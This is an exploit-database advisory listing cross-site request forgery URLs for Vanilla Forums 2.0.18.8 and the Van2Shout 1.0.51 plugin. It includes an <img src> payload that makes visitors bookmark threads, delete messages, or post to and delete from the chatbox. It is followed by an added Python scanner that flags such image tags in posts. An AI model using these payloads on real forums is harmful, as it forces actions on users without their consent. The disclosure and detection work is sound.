Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities

EDB-ID: 24957

CVE:

Platform: PHP

Date: 2013-04-15


# Exploit Title: Vanilla Forums <= 2.0.18.8 & Van2Shout 1.0.51 Multiple CSRF
# Google Dork: n/a
# Date: 13/4/13
# Exploit Author: Henry Hoggard
# Vendor Homepage: [http://vanillaforums.org/, http://vanillaforums.org/addon/van2shout-plugin]
# Software Link: [http://vanillaforums.org/download, http://vanillaforums.org/get/van2shout-plugin-1.051]
# Version: [2.0.18.8 , 1.0.51]
# Tested on: [Debian]
# CVE :

=======================

You can exploit these by having the user visit a thread containing an
image whose src is one of the URLs below.

E.g. <img src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?">
where 1337 is the id.

 

Bookmark CSRF:

http://site.org/index.php=/vanilla/discussion/bookmark/1337

UnBookmark CSRF:

http://site.org/index.php=/vanilla/discussion/bookmark/1337?

Delete Message CSRF:

http://site.org/index.php=/messages/clear/1337

Post to Van2Shout Chat Box CSRF:

http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage

Delete Message from Van2Shout Chatbox CSRF:

http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337
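
A moderation-side check for the delivery method described above, added here as an example and not part of the original advisory: it scans stored post bodies for <img> tags whose src points at one of the state-changing routes listed. The function names, pattern labels and sample posts are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# State-changing routes listed in the advisory; an <img> has no legitimate reason
# to load them. Ignoring case and the /vanilla prefix are assumptions.
ACTION_PATTERNS = {
    "bookmark-toggle": re.compile(r"/discussion/bookmark/\d+", re.I),
    "message-clear": re.compile(r"/messages/clear/\d+", re.I),
    "van2shout-post": re.compile(r"/plugin/Van2ShoutData\b.*[?&]newpost=", re.I),
    "van2shout-delete": re.compile(r"/plugin/Van2ShoutData\b.*[?&]del=", re.I),
}


class ImgSrcCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag/attribute names and unescapes &amp; in values.
        if tag == "img":
            self.sources.extend(v for k, v in attrs if k == "src" and v)


def find_action_images(post_html):
    """Return (action, src) pairs for images that point at action routes."""
    collector = ImgSrcCollector()
    collector.feed(post_html)
    collector.close()
    hits = []
    for src in collector.sources:
        decoded = unquote(src)  # catch %2F-style encoding of the route
        for action, pattern in ACTION_PATTERNS.items():
            if pattern.search(decoded):
                hits.append((action, src))
    return hits


# Constructed sample posts, using the advisory's placeholder host and id.
SAMPLE_POSTS = {
    101: '<p>Nice thread</p><img src="http://site.org/uploads/cat.png">',
    102: '<img src="http://site.org/index.php=/messages/clear/1337">',
    103: '<IMG SRC="http://site.org/index.php?p=/plugin/Van2ShoutData&amp;del=1337" />',
    104: '<img src="http://site.org/index.php?p=%2Fvanilla%2Fdiscussion%2Fbookmark%2F1337">',
}

if __name__ == "__main__":
    for post_id, body in SAMPLE_POSTS.items():
        print(post_id, find_action_images(body))
```

A hit means the post should be held for review; it does not replace fixing the endpoints themselves, which need to reject requests that lack a per-session anti-CSRF token.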